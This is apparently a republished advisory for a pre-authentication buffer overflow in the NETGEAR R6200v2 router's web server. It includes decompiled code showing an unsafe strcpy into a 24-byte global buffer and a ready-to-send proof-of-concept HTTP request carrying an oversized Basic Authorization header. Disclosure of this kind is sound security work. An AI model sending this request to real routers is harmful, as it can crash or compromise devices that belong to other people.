NETGEAR R6200v2 has an unauthorized memory corruption vulnerability.

news/2026/1/21 18:30:46/文章来源:https://www.cnblogs.com/Amalll/p/19513517

Description

A pre-authentication global buffer overflow vulnerability exists in the web server component of the Netgear R6200v2 router. The issue resides within the sub_ED50 function during the processing of HTTP Authorization headers. The server extracts the Base64-encoded authentication string and performs an in-place decoding via the base64decode utility, which lacks boundary checks. Subsequently, the decoded username is copied into a fixed-size 24-byte global buffer (byte_254FFC) using the unsafe strcpy function. By providing a specially crafted credentials string, an unauthenticated attacker can overflow this buffer to overwrite adjacent critical variables and pointers in the .bss segment, such as the dword_255020 URL pointer. This memory corruption can be leveraged to achieve arbitrary code execution or cause a denial-of-service condition on the affected device.

/* Vulnerability Location: sub_ED50 in httpd */

// 1. Taint Source: Extracting the Base64 encoded credentials from the Authorization header
v43 = stristr(v18, "Authorization: Basic ");
v39 = v43 + 21;

// 2. Unsafe Transformation: Decoding the taint without any length or boundary checks
base64decode(v39);

// 3. Taint Separation: Locating the colon separator to isolate the username
v46 = strchr(v39, 58); // Find ':' (ASCII 58)
if ( v46 )
{
*v46 = 0; // Null-terminate the username part

// 4. Vulnerable Sink: Unsafe strcpy into a fixed-size global buffer
// byte_254FFC is allocated only 24 bytes (0x18) in the .bss segment
strcpy(byte_254FFC, v39); 

}

POC

GET /start.htm HTTP/1.1
Host: 192.168.1.1
Cache-Control: max-age=0
Authorization: Basic YWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhOmJiYmJiYmJiYg==
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.1/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/1195873.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

仅通过提示词用豆包实现项目:爬虫+神经网络对目标图片分类

前言 在AI驱动开发的时代,提示词(Prompt)是连接人类需求与AI能力的核心桥梁。尤其对于爬虫神经网络这类技术密集型项目,优秀的提示词能让AI精准输出可用代码、高效解决调试问题,甚至缩短50%以上的开发周期。本文将先拆…

2026杭州公司注册代办服务解析:合规高效解决方案

在企业创立初期,公司注册流程涉及工商、税务等多个环节,手续繁杂且对专业性有一定要求。杭州公司注册代办服务通过提供专业的流程指导、材料准备及手续办理等支持,帮助企业简化注册过程,提升效率,确保合规性,成为…

食品异物检测设备市场格局与技术路径解析

在食品工业范畴当中,保证产品安全属于生产的首要前提条件,其中,异物混入比如像金属、玻璃、石子、塑料碎片等这样的情况,是比较常见且极为普遍的风险来源,为了能够确实有效地剔除这些异物,食品X光检测机已变…

数据结构和算法的学习路径

- 无需先学数据结构的算法类型 像线性枚举、基础排序(选择、冒泡、插入、计数)、前缀和、双指针等算法,主要在数组上操作。 而数组作为基础语法的一部分,大部分学习者在学习编程基础时已掌握,因此学习这类算法前无需专…

纪念品优质厂家推荐:2026年钥匙扣、金属徽章、冰箱贴TOP榜单

在选择优质的纪念品及文创产品(含钥匙扣、金属徽章、冰箱贴)厂家时,了解市场上的最佳选项非常重要。2026 年的市场竞争激烈,但像广东康锐文化传播有限公司等公司,为客户提供了多样化的选择和专业的服务。这些厂家…

2026合同管理系统怎么选择?关键要点解析

随着企业业务规模扩大,合同作为核心法律文件,其管理效率直接影响运营风险与合规水平。从起草、审批到履约跟踪,合同管理系统需覆盖全流程节点,同时适配行业特性与企业架构。如何在众多产品中找到契合自身需求的解决…

2026工业吸尘器十大品牌:技术与服务综合评测

工业吸尘器作为现代工业生产环境中的关键清洁设备,广泛应用于制造业、仓储物流、市政工程等领域,其性能直接影响生产效率与作业环境安全。随着技术的发展,市场上品牌众多,选择时需综合考量产品性能、服务体系及实际…

基于Python+Django的博客系统源码文档部署文档代码讲解等

课题介绍本课题针对传统博客管理操作繁琐、功能单一、扩展性差等问题,设计并实现基于PythonDjango框架的博客系统,构建高效、灵活的个人及多人协作博客平台。系统以MySQL为数据存储核心,结合HTML、CSS、JavaScript及Bootstrap技术搭建美观易用…

2026合同管理软件选型:全流程工具应用盘点

在企业数字化转型进程中,合同管理作为业务合规与风险控制的核心环节,其效率与精准度直接影响企业运营质量。随着全生命周期管理理念的普及,具备从起草、审批到履约、归档全流程能力的工具,正成为中大型企业优化管理…

2026合同管理软件选型:全流程工具应用盘点

在企业数字化转型进程中,合同管理作为业务合规与风险控制的核心环节,其效率与精准度直接影响企业运营质量。随着全生命周期管理理念的普及,具备从起草、审批到履约、归档全流程能力的工具,正成为中大型企业优化管理…

热销榜单:2026年重庆值得信赖的预应力配件品牌推荐

2026年,在重庆选择合适的连接器预应力配件生产厂家至关重要。针对“连接器预应力配件生产厂家哪家靠谱”及“连接器预应力配件厂家哪家好”等问题,市场上几家品牌表现突出。比如,四川蜀都春鹏钢材有限公司以五星级评…

2026 真发定制品牌权威榜单 从产能品控到个性化服务的全维度采购指南与参考手册

当下,假发定制行业正迎来消费升级与产业升级的双重驱动,真发定制凭借自然质感与适配性成为市场主流需求。消费者对假发的诉求已从单纯的外观修饰,延伸至健康无害、舒适透气、个性化表达的深层需求。行业呈现出 “设…

2026年合同管理系统选型推荐榜单及功能特性解析

在企业数字化转型进程中,合同管理作为业务合规与风险控制的核心环节,其系统选型需综合考量功能完整性、场景适配度及技术成熟度。全链路闭环管理能力、行业化解决方案适配性及智能化技术应用,已成为当前企业评估合同…

2026高温炉厂家哪家好?行业技术与服务深度解析

高温炉作为工业生产、科研实验中的关键设备,其性能稳定性、控温精度及服务保障直接影响生产效率与实验结果。在选择合作厂家时,设备的技术实力、生产工艺、售后体系等都是重要考量因素。一、推荐榜单推荐 1:上海冠顶…

2026工业吸尘器品牌推荐:聚焦高效清洁解决方案

工业吸尘器作为工业生产环境中维持清洁、保障生产安全的重要设备,在制造业、仓储物流、市政工程等领域发挥着关键作用。其高效的吸尘能力、对各类粉尘和杂物的处理效率,直接影响着生产环境的整洁度与作业人员的健康安…

热销榜单:2026年重庆钢绞线供应厂家TOP8推荐,助你选择可靠钢绞线销售厂家

在重庆选择合适的17钢绞线生产厂家时,您需要考虑多项因素以确保质量与服务兼具。首先,确认厂家的成立时间和行业经验,这是评估生产可靠性的基础。其次,查看其年产能和生产设备,以确保能够满足您的项目需求。信誉良…

idea中git比对已提交的文件全是空格解决办法

场景: idea在格式化代码会带入大量空格 ,导致查看历史非常繁杂!! 不方便排查 ,忽略空格即可

2026高温炉品牌对比:技术与服务综合分析

高温炉作为工业生产、科研实验中的关键设备,其性能稳定性、工艺精度及服务体系直接影响应用效果。在选择高温炉品牌时,需综合考量设备技术参数、定制能力、售后服务等多方面因素,以匹配不同场景下的实际需求。一、主…

基于python的个性化音乐推荐系统的设计与实现-计算机毕业设计源码+无LW文档

基于Python的个性化音乐推荐系统的设计与实现 摘要:本文详细阐述了基于Python的个性化音乐推荐系统的设计与实现过程。随着音乐数据海量增长,用户找心仪音乐难度增加,个性化推荐需求迫切。本系统利用Python相关技术,具备用户管理、…

2026年驼奶粉品牌/功效/排名/价格/推荐榜:聚焦奶源工艺与市场口碑,优选营养健康新选择

在健康消费观念持续升级的今天,骆驼奶粉凭借其独特的营养价值和更高的消化吸收率,正从区域性特色食品迅速走向全国市场。据行业报告预测,全球骆驼乳制品市场在2026年至2034年间将持续增长。在中国市场,消费者对 “…